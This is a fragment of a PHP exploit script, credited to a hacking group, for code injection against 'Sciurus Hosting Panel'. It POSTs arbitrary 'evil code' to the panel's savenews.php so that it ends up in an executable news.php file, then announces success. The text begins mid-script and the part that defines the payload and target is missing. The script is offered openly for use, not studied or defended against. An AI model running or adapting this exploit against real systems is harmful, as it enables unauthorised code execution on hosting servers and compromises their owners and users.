Sciurus Hosting Panel Code İnject Exploit


Exploit Coded By Liz0ziM From BiyoSecurityTeam
Greetz My all friend and BiyoSecurityTeam User..

"; sleep(1); echo 'Evil Code= '.htmlspecialchars($kodcuk)."
"; sleep(1); echo 'Sending Evil Code.......
'; $paket1=$adres."/acp/savenews.php"; $paket2="filecontents=".$kodcuk; $ch = curl_init(); /*
*/ curl_setopt($ch, CURLOPT_URL, $paket1); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, stripslashes($paket2)); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec ($ch); curl_close ($ch); sleep(5); echo "Exploit Has Been Succeful : ".$adres."/includes/news.php"; } ?>